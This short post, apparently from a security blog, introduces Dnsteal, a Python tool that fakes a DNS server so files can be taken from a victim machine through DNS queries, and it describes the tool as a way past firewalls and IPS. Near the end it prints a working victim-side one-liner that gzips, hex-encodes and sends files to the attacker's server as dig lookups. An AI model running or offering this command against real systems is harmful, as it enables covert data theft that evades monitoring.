Image credits: https://github.com/m57/dnsteal

Dnsteal

Usage Instructions

Add caption

Features:

Support for multiple files

gzip compression supported

For multiple, gzip compressed files use as below:

https://github.com/m57/dnsteal

Data exfiltration, also called data extrusion, data exportation, or data theft is the unauthorized transfer of data from a computer or other device. Data exfiltration is primarily a security breach that occurs when an individual’s or organization's data is illegally copied. Generally, data exfiltration’s are targeted attacks where the hacker’s/cracker’s primary intent is to find and copy specific data from the target machine. Such a transfer may be manual and carried out by someone with physical access to a computer or it may be automated and carried out through malicious programming over a network. There are several methods for Data exfiltration but most of them will be blocked by the endpoint security systems and firewall/IPS implementations. A new tool has been released aiming primarily to bypass all such protections and transfer data through seemingly harmless DNS requests.According to the author, Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once set up and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requestsDnsteal is coded in python and available in GitHub. The author gives an example on how to use this tool in the below image.To begin with, the following command should be entered on the victim machine:Dnstool supports multiple files to be exfiltrated. Use as below.It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the "-z" switch:Then on the victim machine send a Gzipped file like below:for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; doneFor more details head over to GitHub page